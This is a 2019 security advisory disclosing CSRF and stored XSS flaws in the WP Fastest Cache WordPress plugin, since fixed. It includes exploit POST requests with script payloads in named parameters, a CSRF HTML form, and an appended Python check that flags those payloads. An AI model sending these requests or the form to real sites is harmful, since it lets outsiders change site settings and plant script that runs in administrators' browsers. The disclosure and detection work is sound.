Tuesday 2 April 2019

CSRF & Multiple Stored XSS in WP Fastest Cache plugin for WordPress - CVE-2018-17583 to CVE-2018-17586

Exploit Author: Mohammed Ansari S ( ansaert@gmail.com )
Tested Version: 0.8.8.5
Discovered Date: September 26 2018
Fixed Version: 0.8.8.6
Fixed Date: October 9 2018
Active installations: 700,000+


#1 - CVE-2018-17585 - XSS → wpFastestCachePage options

Locate → http://localhost/wordpress/wp-admin/admin.php?page=wpfastestcacheoptions

Affected Vectors:
  1. wpFastestCachePreload_number
  2. wpFastestCacheLanguage

Exploit Request:

POST /wordpress/wp-admin/admin.php?page=wpfastestcacheoptions HTTP/1.1

wpFastestCachePreload_number=4<script>alert(1);</script>
wpFastestCacheLanguage=eng"><script>alert(2);</script>

#2 - CVE-2018-17586 - XSS - action → wpfc_save_timeout_pages

Affected Vectors:
  1. rules[0][content]

Exploit Request:

POST /wordpress498/wp-admin/admin-ajax.php HTTP/1.1

rules%5B0%5D%5Bcontent%5D=%22%3E%3Cscript%3Ealert(3)%3B%3C%2Fscript%3E

#3 - CVE-2018-17583 - XSS - action → wpfc_save_exclude_pages

Affected Vectors:
  1. rules[0][content]

Exploit Request:

POST /wordpress498/wp-admin/admin-ajax.php HTTP/1.1

rules%5B0%5D%5Bcontent%5D=%22%3E%3Cscript%3Ealert(4)%3B%3C%2Fscript%3E

#4 - CVE-2018-17584 - CSRF in page → wpfastestcacheoptions

  1. Create *.html file

<form method="POST" action="http://localhost/wordpress/wp-admin/admin.php?page=wpfastestcacheoptions">
  <input type="text" name="wpFastestCachePage" value="options"><br />
  <input type="text" name="wpFastestCachePreload_number" value="Enter the payload"><br />
  <input type="text" name="wpFastestCacheLanguage" value="engEnter the payload"><br />
  <input type="text" name="submit" value="Save Changes"><br />
  <input type="submit">
</form>

Payload: "><script>alert(1);</script>
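
A log-triage or request-filter check for the parameters in findings #1 to #3 (the same fields the form in #4 submits), added here as an example and not taken from the advisory or the plugin's code. The expected value formats, the function name audit_body and the sample bodies are assumptions constructed from the values shown above.

```python
import re
from urllib.parse import parse_qsl

# Expected value shapes. Assumptions inferred from the benign parts of the
# advisory's values ("4", "eng"); they are not taken from the plugin.
STRICT = {
    "wpFastestCachePreload_number": re.compile(r"\d{1,6}"),
    "wpFastestCacheLanguage": re.compile(r"[A-Za-z_-]{2,10}"),
}
# rules[N][content] is free text, so only flag characters that can break
# out of an HTML attribute or open a tag.
RULE_CONTENT = re.compile(r"rules\[\d+\]\[content\]")
MARKUP = re.compile(r"[<>\"']")

# Constructed sample bodies: the advisory's values, percent-encoded and
# joined with "&", plus one benign request.
SAMPLE_OPTIONS = (
    "wpFastestCachePreload_number=4%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E"
    "&wpFastestCacheLanguage=eng%22%3E%3Cscript%3Ealert(2)%3B%3C%2Fscript%3E"
)
SAMPLE_RULES = "rules%5B0%5D%5Bcontent%5D=%22%3E%3Cscript%3Ealert(3)%3B%3C%2Fscript%3E"
SAMPLE_BENIGN = (
    "wpFastestCachePreload_number=4&wpFastestCacheLanguage=eng"
    "&rules%5B0%5D%5Bcontent%5D=checkout"
)


def audit_body(body):
    """Return sorted (parameter, reason) findings for one
    application/x-www-form-urlencoded POST body."""
    findings = []
    # parse_qsl percent-decodes names and values, so encoded input is
    # checked in its decoded form.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name in STRICT:
            if not STRICT[name].fullmatch(value):
                findings.append((name, "unexpected format"))
        elif RULE_CONTENT.fullmatch(name) and MARKUP.search(value):
            findings.append((name, "markup characters"))
    return sorted(findings)


if __name__ == "__main__":
    for sample in (SAMPLE_OPTIONS, SAMPLE_RULES, SAMPLE_BENIGN):
        print(audit_body(sample))
```

This checks input shape only; it does not cover the missing request-origin check behind the CSRF in #4.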
